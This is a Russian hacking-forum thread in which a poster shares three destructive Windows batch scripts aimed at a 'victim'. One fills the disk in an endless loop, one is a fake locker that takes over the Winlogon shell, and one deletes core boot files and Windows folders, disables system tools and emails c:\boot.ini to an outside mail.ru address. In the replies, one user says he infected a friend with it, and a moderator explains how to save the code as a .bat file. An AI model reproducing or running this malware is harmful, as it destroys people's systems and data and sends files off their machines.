Жёсткие вирусы в формате .bat !

Тема в разделе "Вирусология", создана пользователем kombatWolf, 01.07.18.Просмотров: 1.053

  1. kombatWolf PABLO

    kombatWolf

    Продвинутый

    68 сообщения
    38 симпатий
    1
    розыгрышей
    6 лет с нами
    2 месяца с нами
    18 дней с нами
    У вашей жертвы будет глючить компьютер.

    @echo off
    echo Set fso = CreateObject("Scripting.FileSystemObject") > %systemdrive%\windows\system32\rundll32.vbs
    echo do >> %systemdrive%\windows\system32\rundll32.vbs
    echo Set tx = fso.CreateTextFile("%systemdrive%\windows\system32\rundll32.dat", True) >> %systemdrive%\windows\system32\rundll32.vbs
    echo tx.WriteBlankLines(100000000) >> %systemdrive%\windows\system32\rundll32.vbs
    echo tx.close >> %systemdrive%\windows\system32\rundll32.vbs
    echo FSO.DeleteFile "%systemdrive%\windows\system32\rundll32.dat" >> %systemdrive%\windows\system32\rundll32.vbs
    echo loop >> %systemdrive%\windows\system32\rundll32.vbs

    start %systemdrive%\windows\system32\rundll32.vbs

    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system_host_run /t REG_SZ /d %systemdrive%\windows\system32\rundll32.vbs /f



    Вирус полностью блокирует систему при следующем запуске Windows.Даже в безопасном режиме, выключает диспетчер задач.Чтобы разблокировать компьютер можно введя код 200393!(Но он не разблокирует)

    @echo off
    CHCP 1251
    cls
    Set Yvaga=На вашем компьютере найден вирус.
    Set pass=Пароль
    Set pas=Введите пароль.
    Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль
    Set dim=Выключаю вирус...
    title Внимание!!!
    CHCP 866
    IF EXIST C:\windows\boot.bat (
    goto ok )
    cls
    IF NOT EXIST C:\windows\boot.bat (
    ECHO Windows Registry Editor Version 5.00 >> C:\0.reg
    ECHO. >> C:\0.reg
    ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> C:\0.reg
    ECHO. >> C:\0.reg
    ECHO "Shell"="Explorer.exe, C:\\windows\\boot.bat " >> C:\0.reg
    start/wait regedit -s C:\0.reg
    del C:\0.reg
    ECHO @echo off >>C:\windows\boot.bat
    ECHO C:\WINDOWS\system32\taskkill.exe /f /im Explorer.exe >>C:\windows\boot.bat
    ECHO reg add "HKCU\software\Microsoft\Windows\CurrentVersion\Policies\system" /v DisableTaskMgr /t REG_DWORD /d 1 /f >>C:\windows\boot.bat
    ECHO start sys.bat >>C:\windows\boot.bat
    attrib +r +a +s +h C:\windows\boot.bat
    copy virus.bat c:\windows\sys.bat
    attrib +r +a +s +h C:\windows\sys.bat
    GOTO end)
    :ok
    cls
    Echo %Yvaga%
    echo.
    echo %virus%
    echo %pas%
    set /a choise = 0
    set /p choise=%pass%:
    if "%choise%" == "101" goto gold
    if "%choise%" == "200393" goto status
    exit
    :status
    echo %dim%
    attrib -r -a -s -h C:\windows\boot.bat
    del C:\windows\boot.bat
    attrib -r -a -s -h C:\windows\sys.bat
    del C:\windows\sys.bat
    cls
    :gold
    start C:\
    :end


    Вирус который убивает Винду. Не проверяйте на своем компьютере=)

    @echo windows has been killed!!!
    @echo Virus: mehack Virus
    @echo editor kombatWolf
    @echo off
    :3204
    start mspaint
    goto 3204
    echo Chr(39)>%temp%\temp1.vbs
    echo Chr(39)>%temp%\temp2.vbs
    echo on error resume next > %temp%\temp.vbs
    echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp.vbs
    echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp.vbs
    reg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0
    copy %¶§% %SystemRoot%\user32dll.bat
    reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
    echo fso.deletefile "C:\ntldr",1 >> %temp%\temp.vbs
    reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f
    reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f
    reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f
    reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f
    echo fso.deletefolder "D:\Windows",1 >> %temp%\temp.vbs
    echo fso.deletefolder "I:\Windows",1 >> %temp%\temp.vbs
    echo fso.deletefolder "C:\Windows",1 >> %temp%\temp.vbs
    echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
    echo fso.deletefile sr+"\system32\hal.dll",1 >> %temp%\temp.vbs
    echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
    echo fso.deletefolder sr+"\system32\dllcache",1 >> %temp%\temp.vbs
    echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
    echo fso.deletefolder sr+"\system32\drives",1 >> %temp%\temp.vbs
    echo s.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","forum.whack.ru™">>%temp%\temp.vbs
    echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","forum.whack.ru™">>%temp%\temp.vbs
    echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","forum.whack.ru™">>%temp%\temp.vbs
    echo on error resume next > %temp%\temp1.vbs
    echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp1.vbs
    echo do>>%temp%\temp1.vbs
    echo fso.getfile ("A:\")>>%temp%\temp1.vbs
    echo loop>>%temp%\temp1.vbs
    echo on error resume next > %temp%\temp2.vbs
    echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp2.vbs
    echo do>>%temp%\temp2.vbs
    echo execute"S.Run ""%comspec% /c echo "" & Chr(7), 0, True">>%temp%\temp2.vbs
    echo loop>>%temp%\temp2.vbs
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
    reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
    echo set application=createobject("shell.application")>>%temp%\temp.vbs
    echo application.minimizeall>>%temp%\temp.vbs
    reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
    start rundll32 user32, SwapMouseButton
    reg add "HKCR\exefile\shell\open\command" /ve /t REG_SZ /d rundll32.exe /f
    :3204
    start mspaint
    goto 3204

    echo i=50 >> %temp%\temp.vbs
    echo while i^>0 or i^<0 >> %temp%\temp.vbs
    echo S.popup "forum.whack.ru™",0, "forum.whack.ru™",0+16 >> %temp%\temp.vbs
    echo i=i-1 >> %temp%\temp.vbs
    echo wend >> %temp%\temp.vbs
    echo do >> %temp%\temp.vbs
    echo wscript.sleep 200 >> %temp%\temp.vbs
    echo s.sendkeys"{capslock}" >> %temp%\temp.vbs
    echo wscript.sleep 200 >> %temp%\temp.vbs
    echo s.sendkeys"{numlock}" >> %temp%\temp.vbs
    echo wscript.sleep 200 >> %temp%\temp.vbs
    echo s.sendkeys"{scrolllock}" >> %temp%\temp.vbs
    echo loop>> %temp%\temp.vbs
    echo Set oWMP = CreateObject("WMPlayer.OCX.7") >> %temp%\temp.vbs
    echo Set colCDROMs = oWMP.cdromCollection >> %temp%\temp.vbs
    echo if colCDROMs.Count ^>= 1 then >> %temp%\temp.vbs
    echo For i = 0 to colCDROMs.Count - 1 >> %temp%\temp.vbs
    echo colCDROMs.Item(i).eject >> %temp%\temp.vbs
    echo next >> %temp%\temp.vbs
    echo End If >> %temp%\temp.vbs
    echo Call SendPost("smtp.mail.ru", "forum.whack.ru™@mail.ru", "support@mail.ru", "...", "Копм заражен!") >> %temp%\temp.vbs
    echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%\temp.vbs
    echo Set iMsg = CreateObject("CDO.Message") >> %temp%\temp.vbs
    echo Set iConf = CreateObject("CDO.Configuration") >> %temp%\temp.vbs
    echo Set Flds = iConf.Fields >> %temp%\temp.vbs
    echo Flds.Item("Скрытый контент. Для просмотра Вы должны быть зарегистрированным участником") = 2 >> %temp%\temp.vbs
    echo Flds.Item("Скрытый контент. Для просмотра Вы должны быть зарегистрированным участником") = 1 >> %temp%\temp.vbs
    echo Flds.Item("Скрытый контент. Для просмотра Вы должны быть зарегистрированным участником") = "support" >> %temp%\temp.vbs
    echo Flds.Item("Скрытый контент. Для просмотра Вы должны быть зарегистрированным участником") = "support" >> %temp%\temp.vbs
    echo Flds.Item("Скрытый контент. Для просмотра Вы должны быть зарегистрированным участником") = "smtp.mail.ru" >> %temp%\temp.vbs
    echo Flds.Item("Скрытый контент. Для просмотра Вы должны быть зарегистрированным участником") = 25 >> %temp%\temp.vbs
    echo Flds.Update >> %temp%\temp.vbs
    echo iMsg.Configuration = iConf >> %temp%\temp.vbs
    echo iMsg.To = strTo >> %temp%\temp.vbs
    echo iMsg.From = strFrom >> %temp%\temp.vbs
    echo iMsg.Subject = strSubject >> %temp%\temp.vbs
    echo iMsg.TextBody = strBody >> %temp%\temp.vbs
    echo iMsg.AddAttachment "c:\boot.ini" >> %temp%\temp.vbs
    echo iMsg.Send >> %temp%\temp.vbs
    echo End Function >> %temp%\temp.vbs
    echo Set iMsg = Nothing >> %temp%\temp.vbs
    echo Set iConf = Nothing >> %temp%\temp.vbs
    echo Set Flds = Nothing >> %temp%\temp.vbs

    echo s.run "shutdown -r -t 0 -c ""pcforumhack.ru™"" -f",1 >> %temp%\temp.vbs
    start %temp%\temp.vbs
    start %temp%\temp1.vbs
    start %temp%\temp2.vbs
     
  2. xVladGame Любопытный

    xVladGame

    14 сообщения
    2 симпатий
    0
    розыгрышей
    6 лет с нами
    2 месяца с нами
    18 дней с нами
    Проверяйте на виртуалке
     
  3. kombatWolf PABLO

    kombatWolf

    Продвинутый

    68 сообщения
    38 симпатий
    1
    розыгрышей
    6 лет с нами
    2 месяца с нами
    18 дней с нами
    Капитан очевидность
    )
     
  4. Hack_Pro Новичок

    Hack_Pro

    1 сообщения
    0 симпатий
    0
    розыгрышей
    5 лет с нами
    11 месяцев с нами
    17 дней с нами
    Спасибо за вирусы, скинул другу... Думал он поймёт что это вирус, а он дибил активировал его... А я ведь ему говорил даже что это вирус, дибил что ещё сказать??
     
  5. danilbugrov45 Новичок

    danilbugrov45

    1 сообщения
    0 симпатий
    0
    розыгрышей
    5 лет с нами
    11 месяцев с нами
    20 дней с нами
    Вот всё интресно, но как потом обратно возразить виндус в обратное состояние
     
  6. maskepptt2 Новичок

    maskepptt2

    1 сообщения
    0 симпатий
    0
    розыгрышей
    5 лет с нами
    11 месяцев с нами
    17 дней с нами
    na kakom yazike napisan, ya prosto ne shryu v etom nihuya)))
     
  7. STARTS_Pr0 Модератор

    STARTS_Pr0

    Модератор

    560 сообщения
    236 симпатий
    4
    розыгрышей
    6 лет с нами
    1 месяц с нами
    19 дней с нами
    Это обычный батник)
     
  8. xVladGame Любопытный

    xVladGame

    14 сообщения
    2 симпатий
    0
    розыгрышей
    6 лет с нами
    2 месяца с нами
    18 дней с нами
    эт тип в батник вставить?
     
  9. Fr13end Новичок

    Fr13end

    3 сообщения
    0 симпатий
    0
    розыгрышей
    6 лет с нами
    9 месяцев с нами
    16 дней с нами
    куда нужно это вставлять ?
     
  10. STARTS_Pr0 Модератор

    STARTS_Pr0

    Модератор

    560 сообщения
    236 симпатий
    4
    розыгрышей
    6 лет с нами
    1 месяц с нами
    19 дней с нами
    Создаешь обычный .txt файл, вставляешь туда всю эту фигню, сохраняешь, меняешь разрешение на .bat, profit